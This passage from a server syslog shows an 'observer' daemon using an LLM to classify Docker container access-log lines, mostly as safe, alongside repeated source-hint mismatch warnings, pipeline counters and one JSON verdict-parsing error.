Mar 19 22:24:48 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:24:48.825275 [analyzer] Source hint mismatch: LLM says "docker", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:24:51 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:24:51.762869 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=safe confidence=0.78 action=allow pattern_type=prefix
Mar 19 22:24:51 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:24:51.762900 [analyzer] Source hint mismatch: LLM says "nginx access logs in docker container", actual is "captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo" — skipping pattern
Mar 19 22:24:51 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:24:51.931826 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=safe confidence=0.90 action=allow pattern_type=prefix
Mar 19 22:24:51 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:24:51.931866 [analyzer] Source hint mismatch: LLM says "nginx/apache reverse proxy access logs in Docker", actual is "srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp" — skipping pattern
Mar 19 22:24:53 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:24:53.699112 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=safe confidence=0.86 action=allow pattern_type=prefix
Mar 19 22:24:53 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:24:53.699146 [analyzer] Source hint mismatch: LLM says "nginx (docker:captain-nginx)", actual is "captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo" — skipping pattern
Mar 19 22:24:54 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:24:54.475057 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix
Mar 19 22:24:54 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:24:54.475087 [analyzer] Source hint mismatch: LLM says "docker", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:24:57 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:24:57.965253 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix
Mar 19 22:24:57 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:24:57.965291 [analyzer] Source hint mismatch: LLM says "docker container access logs / application HTTP server", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:25:00 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:25:00.997316 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix
Mar 19 22:25:00 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:25:00.997352 [analyzer] Source hint mismatch: LLM says "docker container access log (app HTTP)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:25:03 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:25:03.622678 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix
Mar 19 22:25:03 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:25:03.622716 [analyzer] Source hint mismatch: LLM says "docker (captain-captain container access log)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:25:06 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:25:06.159410 [observer] Pipeline: processed=26 pattern_hits=11 llm_calls=14 llm_errors=0 learned=0
Mar 19 22:25:06 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:25:06.159529 [observer] Patterns: hash=11 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=15
Mar 19 22:25:06 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:25:06.957957 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix
Mar 19 22:25:06 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:25:06.957999 [analyzer] Source hint mismatch: LLM says "docker container access log (captain-captain)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:25:09 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:25:09.539445 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.66 action=allow pattern_type=prefix
Mar 19 22:25:09 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:25:09.539478 [analyzer] Source hint mismatch: LLM says "docker container web access log (captain-captain)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:25:12 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:25:12.785135 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.74 action=allow pattern_type=prefix
Mar 19 22:25:12 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:25:12.785185 [analyzer] Source hint mismatch: LLM says "docker container access logs / application HTTP server", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:25:15 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:25:15.734353 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix
Mar 19 22:25:15 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:25:15.734386 [analyzer] Source hint mismatch: LLM says "docker container web/API access log", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:25:19 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:25:19.453489 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.70 action=allow pattern_type=prefix
Mar 19 22:25:19 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:25:19.453550 [analyzer] Source hint mismatch: LLM says "docker HTTP access log for captain-captain container", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:25:21 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:25:21.838846 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix
Mar 19 22:25:21 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:25:21.838895 [analyzer] Source hint mismatch: LLM says "docker container access log / application HTTP logs", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:25:24 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:25:24.757375 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix
Mar 19 22:25:24 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:25:24.757414 [analyzer] Source hint mismatch: LLM says "docker/captain web app access log", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:25:26 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:25:26.005148 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix
Mar 19 22:25:26 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:25:26.005207 [analyzer] Source hint mismatch: LLM says "docker container (captain-captain) running an API web service", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:25:27 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:25:27.776675 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.62 action=allow pattern_type=prefix
Mar 19 22:25:27 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:25:27.776708 [analyzer] Source hint mismatch: LLM says "docker/captain (containerized web/API access)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:25:30 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:25:30.726585 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.70 action=allow pattern_type=prefix
Mar 19 22:25:30 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:25:30.726622 [analyzer] Source hint mismatch: LLM says "docker container web/app access logging", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:25:33 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:25:33.871825 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix
Mar 19 22:25:33 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:25:33.871860 [analyzer] Source hint mismatch: LLM says "docker (captain-captain container) / web API access log", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:25:36 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:25:36.160121 [observer] Pipeline: processed=50 pattern_hits=24 llm_calls=25 llm_errors=0 learned=0
Mar 19 22:25:36 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:25:36.160144 [observer] Patterns: hash=24 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=26
Mar 19 22:25:36 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:25:36.753293 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix
Mar 19 22:25:36 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:25:36.753323 [hints] Suggestion for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: field type "duration" seen in 20/20 lines, example: "20.713 ms" → ""
Mar 19 22:25:36 ip-172-26-12-110 observer[1561913]: 2026/03/19
22:25:36.753336 [analyzer] Source hint mismatch: LLM says "docker container (captain)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:25:39 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:25:39.766469 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.86 action=allow pattern_type=prefix Mar 19 22:25:39 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:25:39.766497 [hints] Suggestion for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: field type "timestamp" seen in 12/21 lines, example: "2026-03-19T22:25:38.596385133Z" → "" Mar 19 22:25:39 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:25:39.766510 [analyzer] Source hint mismatch: LLM says "docker container web access logger", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:25:42 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:25:42.910532 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix Mar 19 22:25:42 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:25:42.910570 [analyzer] Source hint mismatch: LLM says "docker/captain application web server (access log)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:25:45 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:25:45.728879 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.74 action=allow pattern_type=prefix Mar 19 22:25:45 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:25:45.728913 [analyzer] Source hint mismatch: LLM says "docker container access to application HTTP logs endpoint", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:25:48 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:25:48.720141 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: 
classification=safe confidence=0.78 action=allow pattern_type=prefix Mar 19 22:25:48 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:25:48.720199 [analyzer] Source hint mismatch: LLM says "docker (containerized web/app server access log)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:25:51 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:25:51.610593 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=noise confidence=0.55 action=suppress pattern_type=prefix Mar 19 22:25:51 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:25:51.610635 [analyzer] Source hint mismatch: LLM says "docker container access log / app HTTP server", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:25:54 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:25:54.944997 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.82 action=allow pattern_type=prefix Mar 19 22:25:54 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:25:54.945036 [analyzer] Source hint mismatch: LLM says "docker-captain (web/API access via container)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:25:57 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:25:57.771709 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix Mar 19 22:25:57 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:25:57.771749 [analyzer] Source hint mismatch: LLM says "docker/access logging for an application (API service)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:26:00 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:26:00.745679 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix Mar 19 22:26:00 
ip-172-26-12-110 observer[1561913]: 2026/03/19 22:26:00.745719 [analyzer] Source hint mismatch: LLM says "docker app access log (HTTP API)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:26:03 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:26:03.766686 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.70 action=allow pattern_type=prefix Mar 19 22:26:03 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:26:03.766722 [analyzer] Source hint mismatch: LLM says "dockerized application (HTTP/API)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:26:06 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:26:06.159460 [observer] Pipeline: processed=74 pattern_hits=38 llm_calls=35 llm_errors=0 learned=0 Mar 19 22:26:06 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:26:06.159482 [observer] Patterns: hash=38 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=36 Mar 19 22:26:06 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:26:06.651926 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.70 action=allow pattern_type=prefix Mar 19 22:26:06 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:26:06.651968 [analyzer] Source hint mismatch: LLM says "docker container access/application logs", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:26:09 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:26:09.818013 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.74 action=allow pattern_type=prefix Mar 19 22:26:09 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:26:09.818048 [analyzer] Source hint mismatch: LLM says "docker (captain-captain container) / application HTTP access logger", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:26:12 
ip-172-26-12-110 observer[1561913]: 2026/03/19 22:26:12.763713 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix Mar 19 22:26:12 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:26:12.763750 [analyzer] Source hint mismatch: LLM says "docker (app container HTTP access logs)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:26:16 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:26:16.082775 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix Mar 19 22:26:16 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:26:16.082810 [analyzer] Source hint mismatch: LLM says "docker container access/API gateway", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:26:18 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:26:18.928797 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix Mar 19 22:26:18 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:26:18.929560 [analyzer] Source hint mismatch: LLM says "docker access log / application web server", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:26:21 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:26:21.880030 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix Mar 19 22:26:21 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:26:21.880065 [analyzer] Source hint mismatch: LLM says "dockerized web/app container (captain-captain)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:26:24 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:26:24.702876 [llm] Failed to parse verdict from: { Mar 19 22:26:24 
ip-172-26-12-110 observer[1561913]: "classification": "safe", Mar 19 22:26:24 ip-172-26-12-110 observer[1561913]: "confidence": 0.72, Mar 19 22:26:24 ip-172-26-12-110 observer[1561913]: "reason": "Appears to be a routine HTTP GET request to an application API endpoint returning 304 (not modified) with a low latency.", Mar 19 22:26:24 ip-172-26-12-110 observer[1561913]: "action": "allow", Mar 19 22:26:24 ip-172-26-12-110 observer[1561913]: "pattern_type": "prefix", Mar 19 22:26:24 ip-172-26-12-110 observer[1561913]: "pattern": "GET /api/v2/user/apps/appData/api", Mar 19 22:26:24 ip-172-26-12-110 observer[1561913]: "source_hint": "docker (captain web/app access logs)", Mar 19 22:26:24 ip-172-26-12-110 observer[1561913]: "variable_fields": [ Mar 19 22:26:24 ip-172-26-12-110 observer[1561913]: { Mar 19 22:26:24 ip-172-26-12-110 observer[1561913]: "token": "", Mar 19 22:26:24 ip-172-26-12-110 observer[1561913]: "type": "", Mar 19 22:26:24 ip-172-26-12-110 observer[1561913]: "replacement": "" Mar 19 22:26:24 ip-172-26-12-110 observer[1561913]: }, Mar 19 22:26:24 ip-172-26-12-110 observer[1561913]: { Mar 19 22:26:24 ip-172-26-12-110 observer[1561913]: "token": "304", Mar 19 22:26:24 ip-172-26-12-110 observer[1561913]: "type": "port", Mar 19 22:26:24 ip-172-26-12-110 observer[1561913]: "replacement": "" Mar 19 22:26:24 ip-172-26-12-110 observer[1561913]: }, Mar 19 22:26:24 ip-172-26-12-110 observer[1561913]: { Mar 19 22:26:24 ip-172-26-12-110 observer[1561913]: "token": "2.190 ms", Mar 19 22:26:24 ip-172-26-12-110 observer[1561913]: "type": "duration", Mar 19 22:26:24 ip-172-26-12-110 observer[1561913]: "replacement": "" Mar 19 22:26:24 ip-172-26-12-110 observer[1561913]: } Mar 19 22:26:24 ip-172-26-12-110 observer[1561913]: ] Mar 19 22:26:24 ip-172-26-12-110 observer[1561913]: } Mar 19 22:26:24 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:26:24.702911 [analyzer] LLM error for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: parsing verdict: invalid character 
'\x1b' in string literal Mar 19 22:26:24 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:26:24.702921 [LLM_ERROR] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Line=2026-03-19T22:26:23.583734303Z GET /api/v2/user/apps/appData/api 304 2.190 ms - - Mar 19 22:26:25 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:26:25.858892 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix Mar 19 22:26:25 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:26:25.858928 [analyzer] Source hint mismatch: LLM says "docker container access log / reverse-proxy", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:26:27 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:26:27.686967 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.76 action=allow pattern_type=contains Mar 19 22:26:27 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:26:27.687011 [analyzer] Source hint mismatch: LLM says "docker/app HTTP access logger", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:26:30 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:26:30.809293 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.82 action=allow pattern_type=prefix Mar 19 22:26:30 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:26:30.809329 [analyzer] Source hint mismatch: LLM says "docker:captain-captain (containerized web/API service)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:26:33 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:26:33.808520 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix Mar 19 22:26:33 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:26:33.808556 [analyzer] Source hint 
mismatch: LLM says "docker/http-access (captain-captain app)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:26:36 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:26:36.160444 [observer] Pipeline: processed=98 pattern_hits=51 llm_calls=46 llm_errors=1 learned=0 Mar 19 22:26:36 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:26:36.160467 [observer] Patterns: hash=51 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=47 Mar 19 22:26:36 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:26:36.823122 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.62 action=allow pattern_type=prefix Mar 19 22:26:36 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:26:36.823230 [analyzer] Source hint mismatch: LLM says "docker (web request access log)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:26:39 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:26:39.618056 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.84 action=allow pattern_type=prefix Mar 19 22:26:39 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:26:39.618092 [analyzer] Source hint mismatch: LLM says "docker", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:26:42 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:26:42.790669 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix Mar 19 22:26:42 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:26:42.790706 [analyzer] Source hint mismatch: LLM says "docker container access logs / application HTTP server", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:26:45 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:26:45.810191 [analyzer] LLM verdict for 
docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.62 action=allow pattern_type=prefix Mar 19 22:26:45 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:26:45.810226 [analyzer] Source hint mismatch: LLM says "docker container access log (captain app)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:26:48 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:26:48.891128 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.70 action=allow pattern_type=prefix Mar 19 22:26:48 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:26:48.891195 [analyzer] Source hint mismatch: LLM says "docker container access log / application HTTP server", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:26:51 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:26:51.726704 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.76 action=allow pattern_type=prefix Mar 19 22:26:51 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:26:51.726740 [analyzer] Source hint mismatch: LLM says "docker container (web/app HTTP access logs)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:26:54 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:26:54.862397 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix Mar 19 22:26:54 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:26:54.862431 [analyzer] Source hint mismatch: LLM says "docker (application HTTP access log)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:26:57 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:26:57.761324 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.62 action=allow 
pattern_type=prefix Mar 19 22:26:57 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:26:57.761362 [analyzer] Source hint mismatch: LLM says "docker container access log / reverse proxy (captain-captain)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:27:00 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:27:00.585571 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.70 action=allow pattern_type=prefix Mar 19 22:27:00 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:27:00.585610 [analyzer] Source hint mismatch: LLM says "docker container web service (captain-captain)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:27:03 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:27:03.951384 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix Mar 19 22:27:03 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:27:03.951423 [analyzer] Source hint mismatch: LLM says "docker container (web/API)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:27:06 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:27:06.159702 [observer] Pipeline: processed=121 pattern_hits=64 llm_calls=56 llm_errors=1 learned=0 Mar 19 22:27:06 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:27:06.159725 [observer] Patterns: hash=64 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=57 Mar 19 22:27:06 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:27:06.786079 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix Mar 19 22:27:06 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:27:06.786126 [analyzer] Source hint mismatch: LLM says "docker container access logs / app HTTP handler", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" 
— skipping pattern Mar 19 22:27:09 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:27:09.654496 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.84 action=allow pattern_type=prefix Mar 19 22:27:09 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:27:09.654535 [analyzer] Source hint mismatch: LLM says "docker container http access logger", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:27:12 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:27:12.957078 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=contains Mar 19 22:27:12 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:27:12.957117 [analyzer] Source hint mismatch: LLM says "dockerized web API (captain-captain service)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:27:15 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:27:15.813392 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix Mar 19 22:27:15 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:27:15.813430 [analyzer] 